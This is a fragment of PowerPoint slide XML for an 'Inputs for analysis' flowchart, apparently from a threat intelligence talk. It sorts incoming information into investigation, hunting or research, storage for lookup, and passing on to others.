        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5210175" y="2949575"/>
            <a:ext cx="550863" cy="785019"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Elbow Connector 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF7F0AD-1BDB-674D-9A37-310B4A17846F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5226894" y="3734594"/>
            <a:ext cx="530225" cy="805656"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48802"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC84BCE-DB5A-DE47-B435-E5912578AD4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="6472238"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inputs for analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB913F3-6BBC-E94C-A2F9-6F1F533D5504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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14000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Focus on information that shoud looked into:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4FD1035-95D4-9047-B23A-2AB48BE7218E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="684213" y="2469357"/>
            <a:ext cx="7545387" cy="3288506"/>
            <a:chOff x="684213" y="2469357"/>
            <a:chExt cx="7545387" cy="3288506"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C2EDB54-261B-FF46-9632-255ACDCB3763}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="684213" y="3614738"/>
              <a:ext cx="1528762" cy="698500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="666666"/>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ea typeface="Droid Sans Fallback" charset="0"/>
                  <a:cs typeface="Droid Sans Fallback" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>incoming</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>information</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BF7F0B-0E6A-C743-BB96-4F750C44AFC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3017838" y="2469357"/>
              <a:ext cx="2835275" cy="455613"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC0066"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>actionable enough</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA51E2B-FCDF-EC4F-96A1-1805F3D0B98B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="2469357"/>
              <a:ext cx="1828800" cy="455612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC0066"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>investigate</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A5C790-048E-8F4E-AF37-AA364204CD3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3017838" y="3236913"/>
              <a:ext cx="2835275" cy="639762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="66CC00"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>might contain sth</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>actionable</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D2C08C6-3084-4E4E-B960-0538C9D25131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="3236913"/>
              <a:ext cx="1828800" cy="639762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="66CC00"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>hunting /</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>research</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B3ADB36-6135-414A-B3D5-CED34BDAF57A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3017838" y="4186238"/>
              <a:ext cx="2835275" cy="639762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>useful for correlation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6B94D3C-73AE-A049-9F75-2740D3DE63E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="4186238"/>
              <a:ext cx="1828800" cy="639762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>store for</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>lookup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83435FCC-1993-644C-A1FA-A2056B63AB68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3017838" y="5118100"/>
              <a:ext cx="2835275" cy="639763"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>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ea typeface="Droid Sans Fallback" charset="0"/>
                  <a:cs typeface="Droid Sans Fallback" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>might be actionable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>to someone else</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB5ECF9E-8BB7-6748-B7FE-4D0CB0B45010}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5118100"/>
              <a:ext cx="1828800" cy="639763"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Droid Sans Fallback" charset="0"/>
                  <a:cs typeface="Droid Sans Fallback" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>pass on</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045CC839-2DC4-884E-A381-72C62089829B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2255114" y="2697956"/>
              <a:ext cx="720585" cy="858838"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Straight Arrow Connector 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB4103C-DD83-7744-95F5-92C9D50C9B23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2320644" y="3533776"/>
              <a:ext cx="589525" cy="269875"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="38" name="Straight Arrow Connector 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0554FD20-821E-0340-9E60-E91B509A784C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2330485" y="4040188"/>
              <a:ext cx="569842" cy="425450"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="39" name="Straight Arrow Connector 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EAF75B4-18C6-934E-96D9-2E2035739239}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2331721" y="4323349"/>
              <a:ext cx="567370" cy="1188451"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{892B9EB9-B682-BC4B-A2D4-27634799937A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="29" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5853113" y="2697163"/>
              <a:ext cx="547687" cy="7722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Straight Arrow Connector 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACBF61D9-A93A-694D-8FF1-3B9331E427B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5853113" y="3558226"/>
              <a:ext cx="547687" cy="7722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
